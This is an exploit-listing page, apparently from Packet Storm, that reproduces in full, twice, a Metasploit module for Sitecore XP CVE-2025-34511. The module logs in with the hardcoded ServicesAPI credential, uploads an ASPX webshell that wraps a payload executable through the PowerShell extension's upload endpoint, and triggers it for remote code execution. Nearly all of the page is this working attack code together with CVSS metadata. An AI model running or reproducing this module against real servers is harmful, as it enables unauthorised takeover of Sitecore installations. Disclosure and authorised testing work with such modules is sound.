📄 Sitecore XP Post-Authentication File Upload_PACKETSTORM:209455

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

This...

Visit Original Source

Basic Information

ID PACKETSTORM:209455

Published Sep 12, 2025 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::SitecoreXp
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sitecore XP CVE-2025-34511 Post-Authentication File Upload',
'Description' => %q{
This module exploits CVE-2025-34511, a file upload vulnerability in PowerShell extensions. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.
},
'License' => MSF_LICENSE,

'Author' => [
'Piotr Bazydlo', # Discovery
'msutovsky-r7' # Module Creator
],
'References' => [
[ 'CVE', '2025-34511' ],
['URL', 'https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform'],
['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667']
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'Windows',
{
'Arch' => [ARCH_X86, ARCH_X64]
}
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DisclosureDate' => '2025-06-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/']),
])
end

def check
return Exploit::CheckCode::Unknown('Could not log in, application might not be Sitecore') unless login_identitysrv('ServicesAPI', 'b')

@is_logged = true

return Exploit::CheckCode::Safe('Could not get elevated cookies') unless get_identity_cookies

@is_elevated = true

sitecore_version = get_version

res = send_request_cgi({
'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
'method' => 'GET',
'vars_get' => { 'hdl' => '1245516121' }
})

return Exploit::CheckCode::Safe('PowerShell extension not detected, might not be installed in target Sitecore instance') unless res&.code == 200

return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))

Exploit::CheckCode::Safe("Detected Sitecore version #{sitecore_version}, which is not vulnerable")
end

def upload_webshell
@webshell = "#{Rex::Text.rand_text_alpha(15)}.aspx"
@item_uri = Rex::Text.rand_text_alpha(8)
exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_aspx(exe)

data_post = Rex::MIME::Message.new
data_post.add_part(@item_uri, nil, nil, %(form-data; name="ItemUri"))
data_post.add_part('en', nil, nil, %(form-data; name="LanguageName"))
data_post.add_part('0', nil, nil, %(form-data; name="Overwrite"))
data_post.add_part('0', nil, nil, %(form-data; name="Unpack"))
data_post.add_part('en', nil, nil, %(form-data; name="Versioned"))
data_post.add_part(asp, 'text/plain', nil, %(form-data; name="#{@item_uri}"; filename="#{@webshell}"))

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
'vars_get' => { 'hdl' => '1245516121' },
'data' => data_post.to_s,
'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
})

return false unless res&.code == 200

true
end

def trigger_webshell
send_request_cgi({
'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', @item_uri, @webshell),
'method' => 'GET'
})
end

def exploit
if !@is_logged && !login_identitysrv('ServicesAPI', 'b')
fail_with(Failure::NoAccess, 'Failed to log in, check the credentials')
end

if !@is_elevated && !get_identity_cookies
fail_with(Failure::Unknown, 'Failed to get elevated cookies')
end

fail_with(Failure::PayloadFailed, 'Failed to upload webshell') unless upload_webshell

trigger_webshell
end
end

{
    "lastseen": "2025-09-12T17:07:53",
    "description": "This...",
    "published": "2025-09-12T00:00:00",
    "modified": "2025-09-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Sitecore XP Post-Authentication File Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:209455",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-34509",
        "CVE-2025-34511"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HTTP::SitecoreXp\n      include Msf::Exploit::CmdStager\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Sitecore XP CVE-2025-34511 Post-Authentication File Upload',\n            'Description' => %q{\n              This module exploits CVE-2025-34511, a file upload vulnerability in PowerShell extensions. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.\n            },\n            'License' => MSF_LICENSE,\n    \n            'Author' => [\n              'Piotr Bazydlo', # Discovery\n              'msutovsky-r7' # Module Creator\n            ],\n            'References' => [\n              [ 'CVE', '2025-34511' ],\n              ['URL', 'https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform'],\n              ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667']\n            ],\n            'Platform' => 'win',\n            'Arch' => [ARCH_X86, ARCH_X64],\n            'Targets' => [\n              [\n                'Windows',\n                {\n                  'Arch' => [ARCH_X86, ARCH_X64]\n                }\n              ]\n            ],\n            'DefaultOptions' => {\n              'RPORT' => 443,\n              'SSL' => true\n            },\n            'DisclosureDate' => '2025-06-17',\n            'DefaultTarget' => 0,\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n            }\n          )\n        )\n    \n        register_options([\n          OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/']),\n        ])\n      end\n    \n      def check\n        return Exploit::CheckCode::Unknown('Could not log in, application might not be Sitecore') unless login_identitysrv('ServicesAPI', 'b')\n    \n        @is_logged = true\n    \n        return Exploit::CheckCode::Safe('Could not get elevated cookies') unless get_identity_cookies\n    \n        @is_elevated = true\n    \n        sitecore_version = get_version\n    \n        res = send_request_cgi({\n          'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),\n          'method' => 'GET',\n          'vars_get' => { 'hdl' => '1245516121' }\n        })\n    \n        return Exploit::CheckCode::Safe('PowerShell extension not detected, might not be installed in target Sitecore instance') unless res&.code == 200\n    \n        return Exploit::CheckCode::Vulnerable(\"Sitecore version detected #{sitecore_version}, which is vulnerable\") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))\n    \n        Exploit::CheckCode::Safe(\"Detected Sitecore version #{sitecore_version}, which is not vulnerable\")\n      end\n    \n      def upload_webshell\n        @webshell = \"#{Rex::Text.rand_text_alpha(15)}.aspx\"\n        @item_uri = Rex::Text.rand_text_alpha(8)\n        exe = generate_payload_exe\n        asp = Msf::Util::EXE.to_exe_aspx(exe)\n    \n        data_post = Rex::MIME::Message.new\n        data_post.add_part(@item_uri, nil, nil, %(form-data; name=\"ItemUri\"))\n        data_post.add_part('en', nil, nil, %(form-data; name=\"LanguageName\"))\n        data_post.add_part('0', nil, nil, %(form-data; name=\"Overwrite\"))\n        data_post.add_part('0', nil, nil, %(form-data; name=\"Unpack\"))\n        data_post.add_part('en', nil, nil, %(form-data; name=\"Versioned\"))\n        data_post.add_part(asp, 'text/plain', nil, %(form-data; name=\"#{@item_uri}\"; filename=\"#{@webshell}\"))\n    \n        res = send_request_cgi({\n          'method' => 'POST',\n          'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),\n          'vars_get' => { 'hdl' => '1245516121' },\n          'data' => data_post.to_s,\n          'ctype' => \"multipart/form-data; boundary=#{data_post.bound}\"\n        })\n    \n        return false unless res&.code == 200\n    \n        true\n      end\n    \n      def trigger_webshell\n        send_request_cgi({\n          'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', @item_uri, @webshell),\n          'method' => 'GET'\n        })\n      end\n    \n      def exploit\n        if !@is_logged && !login_identitysrv('ServicesAPI', 'b')\n          fail_with(Failure::NoAccess, 'Failed to log in, check the credentials')\n        end\n    \n        if !@is_elevated && !get_identity_cookies\n          fail_with(Failure::Unknown, 'Failed to get elevated cookies')\n        end\n    \n        fail_with(Failure::PayloadFailed, 'Failed to upload webshell') unless upload_webshell\n    \n        trigger_webshell\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/209455",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/209455/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply